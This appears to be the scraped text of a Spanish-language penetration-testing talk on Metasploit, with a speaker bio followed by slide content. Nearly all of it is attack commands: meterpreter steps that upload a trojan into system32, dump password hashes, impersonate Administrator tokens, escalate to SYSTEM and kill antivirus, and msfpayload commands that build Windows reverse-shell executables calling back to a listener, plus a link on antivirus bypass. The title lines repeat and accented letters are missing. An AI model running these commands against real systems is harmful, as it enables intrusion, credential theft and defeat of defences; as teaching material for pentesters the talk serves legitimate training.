Professional Documents
Culture Documents
Andrés Morales Zamudio Oscp Oswp Gcih Gpen Cpts C - Eh Osce Iso 27001 La Cissp
Andrés Morales Zamudio Oscp Oswp Gcih Gpen Cpts C - Eh Osce Iso 27001 La Cissp
Andrés Morales Zamudio Oscp Oswp Gcih Gpen Cpts C - Eh Osce Iso 27001 La Cissp
com OSCP OSWP GCIH GPEN CPTS C|EH OSCE ISO 27001 LA CISSP
Ingeniero de Sistemas Ingeniero de Preventa en Ximark OSCP OSWP GCIH GPEN CPTS C|EH OSCE ISO 27001 LA CISSP Cuatro aos de experiencia en Seguridad de la informacin, realizando Pentest, manejo de incidente y anlisis forense en Gobierno, Banca, Telco y Retail en la regin. Ekoparty Warrior, vencedor del primer PacketWars realizado en Latinoamrica. Octubre 2008, Argentina.
Port Scanning
msf > search portscan msf > use auxiliary/scanner/portscan/syn
meterpreter > help meterpreter > ps meterpreter > migrate pid meterpreter > ls meterpreter > download c:\\boot.ini meterpreter > upload troyano.exe c:\\windows\\system32
meterpreter > ipconfig meterpreter > getuid meterpreter > execute -f cmd.exe -i H meterpreter > shell meterpreter > idletime meterpreter > hashdump
meterpreter > use incognito meterpreter > help meterpreter > list_tokens u meterpreter > impersonate_token WIN2K8\\Administrator meterpreter > getuid meterpreter > execute -f cmd.exe -i -t
http://labs.mwrinfosecurity.com/publications/mwri_security-implications-ofwindows-access-tokens_2008-04-14.pdf
meterpreter > getuid meterpreter > use priv meterpreter > getsystem h meterpreter > getsystem ...got system (via technique 4). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
meterpreter > run checkvm meterpreter > run getcountermeasure meterpreter > run getgui meterpreter > run getgui e meterpreter > run gettelnet meterpreter > run gettelnet e meterpreter > run killav
meterpreter > run get_local_subnets meterpreter > run hostsedit meterpreter > run remotewinenum meterpreter > run remotewinenum -u administrador -p yotengolacontrasena -t 10.211.55.128 meterpreter > run winenum meterpreter > run scraper
./msfpayload windows/shell_reverse_tcp O ./msfpayload windows/shell_reverse_tcp LHOST=192.168.147.128 LPORT=8080 O ./msfpayload windows/shell_reverse_tcp LHOST=192.168.147.128 LPORT=8080 X > /tmp/1.exe file /tmp/1.exe
./msfpayload windows/shell/reverse_tcp LHOST=192.168.147.128 LPORT=8080 X > /tmp/a.exe ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.147.128 LPORT=8080 E
http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass
GRACIAS!